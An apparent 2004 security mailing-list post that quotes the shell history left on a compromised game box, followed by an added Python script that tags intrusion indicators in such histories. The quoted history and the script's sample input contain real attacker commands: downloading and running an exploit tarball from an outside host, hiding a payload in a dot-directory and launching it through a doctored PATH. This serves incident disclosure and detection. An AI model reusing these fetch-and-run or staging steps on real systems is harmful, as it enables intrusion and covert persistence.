Greetings list,

Accidentally sent only to Stefan, so redoing it.
On Thu, Jul 29, 2004 at 06:38:15PM +0200, Stefan Janecek wrote:
> Hmmm - I have also been getting those login attempts, but thought them to
> be harmless. Maybe they are not *that* harmless, though... Today I
> managed to get my hands on a machine that was originating such login
> attempts. I must admit I am far from being a linux security expert, but
> this is what I've found out up to now:

I had a similar experience from a game box I look after
(void.labs.pulltheplug.com, but people may prefer
http://vortex.labs.pulltheplug.com; feel free to jump on the irc server @
irc.pulltheplug.com, #social or #vortex).

The .bash_history is as follows:

passwd
uname -a
cat /etc/issue
w
/sbin.ifconfig
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
ftp ftp.sh3ll.info
lynx
lynx www.sh3ll.info/milenium/xpl.tgz
ls
ls -alF
tar zxv xpl.tgz
tar zxvf xpl.tgz
cd supe`
cd super
./prt
lynx mil3nium.go.ro/milenium
lynx mil3nium.go.ro/
ncftp
ncftpget
lynx sh3ll.info/milenium/milenium
ls
ls -alF
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
PATH='.:$PATH' inetd -e -o

It would appear that if they can't get a local root, they'll use the box
for IRCing from.

Hopefully this helps someone. I haven't looked too much into this; if
wanted I could grab the source ip addresses used for logging into guest,
but that's probably not overly useful.

Thanks,
Andrew Griffiths

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
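Added example (not part of the original post, and not a tool Andrew or pulltheplug used): a small Python triage script that tags the kind of shell history quoted above. It splits each history line into simple commands, tags the steps the post shows (recon, fetching and unpacking a tarball, running ./prt from the unpacked directory, staging something in a dot-directory, and finally starting a bare name with PATH='.:$PATH', which makes the shell run ./inetd from the current directory rather than the system daemon) and rolls the tags up into the two behaviours the post describes. The indicator lists, tag names and verdict strings are my own assumptions; the sample history is retyped from the post with the attacker's typos kept and a few no-op lines dropped, so it runs offline.

```python
import itertools
import os
import re
import shlex
from collections import Counter, namedtuple

# Constructed sample input: the .bash_history quoted in the post above, retyped
# with the attacker's typos intact (bare ls/lynx/ncftp lines omitted for brevity).
SAMPLE_HISTORY = """\
passwd
uname -a
cat /etc/issue
w
/sbin/ifconfig
wget sh3ll.info/milenium/xpl.tgz;tar zxvf xpl.tgz;cd super;./prt
lynx www.sh3ll.info/milenium/xpl.tgz
tar zxvf xpl.tgz
cd super
./prt
lynx mil3nium.go.ro/milenium
ps -aux |grep test
lynx sh3ll.info/milenium/psy1985.tgz
mkdir .drivers
mv psy1985.tgz .drivers
cd .drivers
tar zxvf psy1985.tgz
rm -rf psy1985.tgz
cd nsmail/
PATH='.:$PATH' inetd -e -o
"""

Finding = namedtuple("Finding", "lineno command tags")
# Indicator lists below are assumptions for this example, not from the post.
FETCHERS = {"wget", "curl", "lynx", "ftp", "ncftp", "ncftpget", "fetch", "scp"}
RECON_CMDS, RECON_FILES = {"uname", "w", "who", "id", "ifconfig", "ps", "last"}, {"/etc/issue", "/etc/passwd", "/proc/version"}
ACCOUNT_CMDS, DIR_CMDS = {"passwd", "useradd", "adduser", "usermod"}, {"mkdir", "cd", "mv", "cp"}
ARCHIVE_RE = re.compile(r"\.(tgz|tar\.gz|tar\.bz2|tar|zip)$", re.I)
HIDDEN_RE = re.compile(r"(^|/)\.[^/.][^/]*/?$")  # a dot-directory component other than . or ..
ASSIGN_RE = re.compile(r"^([A-Za-z_]\w*)=(.*)$")

def tokenize(line):
    """Shell-style tokens; ';' '|' '&' come out as separate tokens."""
    lex = shlex.shlex(line, posix=True, punctuation_chars=True)
    lex.whitespace_split, lex.commenters = True, ""
    try:
        return list(lex)
    except ValueError:  # unbalanced quote in a mangled history line
        return line.split()

def simple_commands(tokens):
    """Yield the simple commands between ; | & separators."""
    for is_sep, grp in itertools.groupby(tokens, lambda t: t in {";", "|", "||", "&&", "&"}):
        if not is_sep:
            yield list(grp)

def classify(argv):
    """Return the indicator tags for one simple command (list of tokens)."""
    tags, env, argv = set(), {}, list(argv)
    while argv and ASSIGN_RE.match(argv[0]):  # leading VAR=value prefixes
        name, value = ASSIGN_RE.match(argv.pop(0)).groups()
        env[name] = value
    # PATH='.:$PATH' (or an empty element) makes the shell search cwd first,
    # so a bare name like 'inetd' then runs ./inetd, not the system daemon.
    if any(p in ("", ".") for p in env.get("PATH", "/").split(":")):
        tags.add("cwd_in_path")
    head = argv[0] if argv else ""
    cmd, args = os.path.basename(head), argv[1:]
    has_archive = any(ARCHIVE_RE.search(a) for a in args)
    checks = [
        ("account_change", cmd in ACCOUNT_CMDS),
        ("recon", cmd in RECON_CMDS or (cmd == "cat" and any(a in RECON_FILES for a in args))),
        ("fetch", cmd in FETCHERS and bool(args)),
        ("fetch_archive", cmd in FETCHERS and has_archive),
        ("unpack_archive", cmd == "tar" and has_archive),
        ("cleanup", cmd == "rm" and has_archive),
        ("run_from_cwd", head.startswith("./")),
        ("hidden_dir", cmd in DIR_CMDS and any(HIDDEN_RE.search(a) for a in args)),
        ("bare_name_via_cwd", "cwd_in_path" in tags and bool(head) and "/" not in head),
    ]
    return tags | {tag for tag, hit in checks if hit}

def scan_history(text):
    """Tag every simple command in a history; untagged commands are dropped."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for argv in simple_commands(tokenize(line)):
            tags = classify(argv)
            if tags:
                findings.append(Finding(lineno, " ".join(argv), frozenset(tags)))
    return findings

def summarize(findings):
    return Counter(t for f in findings for t in f.tags)

def assess(findings):
    """Roll the tags up into the two behaviours the post describes."""
    c, verdicts = summarize(findings), []
    if c["fetch_archive"] and c["unpack_archive"] and c["run_from_cwd"]:
        verdicts.append("archive fetched, unpacked and run from cwd: local exploit attempt")
    if c["hidden_dir"] and c["cwd_in_path"]:
        verdicts.append("payload staged in a dot-directory and started via '.' in PATH: the IRC-from-the-box pattern")
    return verdicts
```

Run `scan_history(SAMPLE_HISTORY)` and print the findings to see the tags per line, or `assess(...)` for the two verdicts. The split on `;` and `|` matters: the single `wget ...;tar ...;cd super;./prt` line carries three of the indicators on its own, and a per-line regex would miss that. Note the script only works on whatever .bash_history survived; an attacker who unsets HISTFILE or truncates the file leaves nothing to scan, so treat an empty or suspiciously short history on a box showing these login attempts as a finding in itself.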
